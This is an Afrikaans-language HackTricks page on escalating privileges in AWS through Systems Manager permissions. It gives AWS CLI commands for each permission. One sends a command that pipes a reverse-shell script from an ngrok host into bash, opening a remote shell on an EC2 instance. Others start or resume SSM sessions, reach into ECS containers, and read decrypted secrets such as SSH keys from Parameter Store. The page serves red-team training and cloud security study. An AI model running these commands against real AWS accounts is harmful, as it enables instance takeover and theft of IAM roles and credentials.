AWS - SSM Privesc

Leer & oefen AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Leer & oefen GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Ondersteun HackTricks

Kyk na die subskripsie planne!
Sluit aan by die 💬 Discord groep of die telegram groep of volg ons op Twitter 🐦 @hacktricks_live.
Deel hacking truuks deur PRs in te dien na die HackTricks en HackTricks Cloud github repos.

SSM

Vir meer inligting oor SSM kyk:

AWS - EC2, EBS, ELB, SSM, VPC & VPN Enum

`ssm:SendCommand`

'n Aanvaller met die toestemming ssm:SendCommand kan opdragte uitvoer in instansies wat die Amazon SSM Agent draai en die IAM Rol wat binne dit draai, kompromitteer.

# Check for configured instances
aws ssm describe-instance-information
aws ssm describe-sessions --state Active

# Send rev shell command
aws ssm send-command --instance-ids "$INSTANCE_ID" \
--document-name "AWS-RunShellScript" --output text \
--parameters commands="curl https://reverse-shell.sh/4.tcp.ngrok.io:16084 | bash"

In die geval dat jy hierdie tegniek gebruik om voorregte te verhoog binne 'n reeds gecompromitteerde EC2-instantie, kan jy net die rev shell plaaslik vang met:

# If you are in the machine you can capture the reverseshel inside of it
nc -lvnp 4444 #Inside the EC2 instance
aws ssm send-command --instance-ids "$INSTANCE_ID" \
--document-name "AWS-RunShellScript" --output text \
--parameters commands="curl https://reverse-shell.sh/127.0.0.1:4444 | bash"

Potensiële Impak: Direkte privesc na die EC2 IAM rolle wat aan lopende instansies met SSM Agents gekoppel is.

`ssm:StartSession`

'n Aanvaller met die toestemming ssm:StartSession kan 'n SSH-agtige sessie in instansies wat die Amazon SSM Agent draai, begin en die IAM Rol wat binne dit loop, kompromitteer.

# Check for configured instances
aws ssm describe-instance-information
aws ssm describe-sessions --state Active

# Send rev shell command
aws ssm start-session --target "$INSTANCE_ID"

Om 'n sessie te begin, moet jy die SessionManagerPlugin geïnstalleer hê: https://docs.aws.amazon.com/systems-manager/latest/userguide/install-plugin-macos-overview.html

Potensiële Impak: Direkte privesc na die EC2 IAM rolle wat aan lopende instansies met SSM Agents gekoppel is.

Privesc na ECS

Wanneer ECS take met ExecuteCommand geaktiveer loop, kan gebruikers met genoeg regte ecs execute-command gebruik om 'n opdrag binne die houer uit te voer. Volgens die dokumentasie word dit gedoen deur 'n veilige kanaal te skep tussen die toestel wat jy gebruik om die “exec“ opdrag te begin en die teikenhouer met SSM Session Manager. (SSM Session Manager Plugin is nodig vir dit om te werk) Daarom sal gebruikers met ssm:StartSession in staat wees om 'n skulp binne ECS take met daardie opsie geaktiveer te kry deur net te loop:

aws ssm start-session --target "ecs:CLUSTERNAME_TASKID_RUNTIMEID"

Potensiële Impak: Direkte privesc na die ECSIAM rolle wat aan lopende take met ExecuteCommand geaktiveer is, geheg is.

`ssm:ResumeSession`

'n Aanvaller met die toestemming ssm:ResumeSession kan 'n SSH-agtige sessie in instances wat die Amazon SSM Agent met 'n afgekoppelde SSM sessietoestand draai, her-begin en die IAM Rol wat binne dit draai, kompromitteer.

# Check for configured instances
aws ssm describe-sessions

# Get resume data (you will probably need to do something else with this info to connect)
aws ssm resume-session \
--session-id Mary-Major-07a16060613c408b5

Potensiële Impak: Direkte privesc na die EC2 IAM rolle wat aan lopende instansies met SSM Agents wat loop en ontkoppelde sessies geheg is.

`ssm:DescribeParameters`, (`ssm:GetParameter` | `ssm:GetParameters`)

'n Aanvaller met die genoemde toestemmings gaan in staat wees om die SSM parameters te lys en dit in duidelike teks te lees. In hierdie parameters kan jy dikwels sensitiewe inligting soos SSH sleutels of API sleutels vind.

aws ssm describe-parameters
# Suppose that you found a parameter called "id_rsa"
aws ssm get-parameters --names id_rsa --with-decryption
aws ssm get-parameter --name id_rsa --with-decryption

Potensiële Impak: Vind sensitiewe inligting binne die parameters.

`ssm:ListCommands`

'n Aanvaller met hierdie toestemming kan al die opdragte lys wat gestuur is en hoopvol sensitiewe inligting daarop vind.

aws ssm list-commands

Potensiële Impak: Vind sensitiewe inligting binne die opdraglyne.

`ssm:GetCommandInvocation`, (`ssm:ListCommandInvocations` | `ssm:ListCommands`)

'n Aanvaller met hierdie toestemmings kan al die opdragte lys wat gestuur is en die uitvoer lees wat gegenereer is, in die hoop om sensitiewe inligting daarop te vind.

# You can use any of both options to get the command-id and instance id
aws ssm list-commands
aws ssm list-command-invocations

aws ssm get-command-invocation --command-id <cmd_id> --instance-id <i_id>

Potensiële Impak: Vind sensitiewe inligting binne die uitvoer van die opdraglyne.

Codebuild

Jy kan ook SSM gebruik om binne 'n codebuild projek wat gebou word, te kom:

AWS - Codebuild Privesc

Ondersteun HackTricks

Kyk na die subskripsie planne!
Sluit aan by die 💬 Discord groep of die telegram groep of volg ons op Twitter 🐦 @hacktricks_live.
Deel hacking truuks deur PRs in te dien na die HackTricks en HackTricks Cloud github repos.

PreviousAWS - Secrets Manager Privesc NextAWS - Step Functions Privesc

Last updated 9 days ago

SSM

ssm:SendCommand

ssm:StartSession

Privesc na ECS

ssm:ResumeSession

ssm:DescribeParameters, (ssm:GetParameter | ssm:GetParameters)

ssm:ListCommands

ssm:GetCommandInvocation, (ssm:ListCommandInvocations | ssm:ListCommands)

Codebuild

SSM

ssm:SendCommand

ssm:StartSession

Privesc na ECS

ssm:ResumeSession

ssm:DescribeParameters, (ssm:GetParameter | ssm:GetParameters)

ssm:ListCommands

ssm:GetCommandInvocation, (ssm:ListCommandInvocations | ssm:ListCommands)

Codebuild

`ssm:SendCommand`

`ssm:StartSession`

`ssm:ResumeSession`

`ssm:DescribeParameters`, (`ssm:GetParameter` | `ssm:GetParameters`)

`ssm:ListCommands`

`ssm:GetCommandInvocation`, (`ssm:ListCommandInvocations` | `ssm:ListCommands`)

`ssm:SendCommand`

`ssm:StartSession`

`ssm:ResumeSession`

`ssm:DescribeParameters`, (`ssm:GetParameter` | `ssm:GetParameters`)

`ssm:ListCommands`

`ssm:GetCommandInvocation`, (`ssm:ListCommandInvocations` | `ssm:ListCommands`)